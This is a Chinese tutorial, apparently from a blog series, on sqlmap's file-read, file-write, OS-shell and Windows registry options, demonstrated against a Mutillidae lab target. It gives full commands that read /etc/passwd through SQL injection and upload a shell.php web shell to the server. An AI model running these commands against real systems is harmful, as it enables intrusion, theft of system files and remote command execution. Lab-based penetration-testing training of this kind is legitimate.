二十四、SQLMap自动注入-(10)Filesystem、OS
2017-12-04 本文已影响0人
cybeyond
目录
- Filesystem类
1.1 选项 --file-read
1.2 选项 --file-write- OS类
2.1 MySQL、Postgresql
2.2 Mssql
2.3 选项 --sql-shell
2.4 选项 --os-shell
2.5 选项 --os-cmd- Windows Registory类
3.1 选项--reg-read
3.2 选项--reg-add
3.3 选项--reg-del
3.4 其他选项
1、Filesystem类
1.1、 选项 --file-read
sqlmap -u "192.168.50.183/mutillidae/index.php?page=user-info.php&username=12&password=12&user-info-php-submit-button=View+Account+Details" -p "username" --file-read="/etc/passwd"
执行完成后,会将其保存到如下目录中:
保存路径
查看该文件,即为系统中的/etc/passwd中的内容
查看文件内容
1.2、选项 --file-write
首先,在当前目录下创建一个shell.php的脚本文件
创建shell.php脚本文件
然后执行sqlmap:
sqlmap -u "192.168.50.183/mutillidae/index.php?page=user-info.php&username=12&password=12&user-info-php-submit-button=View+Account+Details" -p "username" --file-write="shell.php" --file-dest="/tmp/shell.php"
//shell.php在当前执行命令提示符下有该文件,并将其写到目标服务器的/tmp/shell.php中
到靶机上查看此文件
写入文件成功
2、OS类
2.1、MySQL、Postgresql
- 上传共享库并生成sys_exec()、sys_eval()两个UDF
2.2、Mssql
- xp_cmdshell存储过程
2.3、选项 --sql-shell
--sql-shell
2.4、选项 --os-shell
--os-shell
2.5、选项 --os-cmd
--os-cmd id //后接系统指令
3、Windows Registory类
3.1、选项--reg-read
读取注册表的键值
--reg-read
3.2、选项--reg-add
增加注册表中的信息
--reg-add
3.3、选项--reg-del
删除注册表键值
--reg-del
3.4、其他选项
--reg-key
--reg-value
--reg-data
--reg-type
举例:
sqlmap –u="http://1.1.1.1/a.aspx?id=1" --reg-add --regkey="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
